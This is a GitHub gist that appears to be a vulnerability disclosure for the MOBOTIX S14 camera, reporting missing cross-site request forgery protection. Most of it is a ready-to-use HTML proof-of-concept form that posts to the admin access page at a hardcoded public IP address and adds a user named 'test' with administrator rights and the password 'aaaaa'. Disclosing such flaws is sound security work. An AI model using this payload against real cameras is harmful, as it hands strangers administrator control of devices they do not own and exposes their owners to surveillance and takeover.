Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Summary
The MOBOTIX S14 Camera did not implement any mechanism to avoid cross-site request forgery (CSRF) attacks.
Impact
Successful exploitation of this vulnerability can lead to the takeover of the device.
Deatils
The MOBOTIX S14 Camera did not implement any mechanism to avoid cross-site request forgery attacks.
This can lead to allow a local account password to be changed without the knowledge of the authenticated user.
POC - the following PoC will add a test user, with a password of 'aaaaa'. Note, this user has admin priviledges.
<html>
<body>
<form method="POST" action="http://82.71.22.180:8001/admin/access">
<input type="hidden" name="user_name_0" value="admin"/>
<input type="hidden" name="user_group_0" value="admins"/>
<input type="hidden" name="user_passwd_a_0" value="***"/>
<input type="hidden" name="user_passwd_b_0" value="***"/>
<input type="hidden" name="user_name_1" value="rayspeed"/>
<input type="hidden" name="user_group_1" value="users"/>
<input type="hidden" name="user_passwd_a_1" value="***"/>
<input type="hidden" name="user_passwd_b_1" value="***"/>
<input type="hidden" name="user_name_2" value="test"/>
<input type="hidden" name="user_group_2" value="admins"/>
<input type="hidden" name="user_passwd_a_2" value="aaaaa"/>
<input type="hidden" name="user_passwd_b_2" value="aaaaa"/>
<input type="hidden" name="sv_passwd_a" value=""/>
<input type="hidden" name="sv_passwd_b" value=""/>
<input type="hidden" name="save_config" value="Set"/>
<input type="submit" value="Submit">
</form>
</body>
<html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.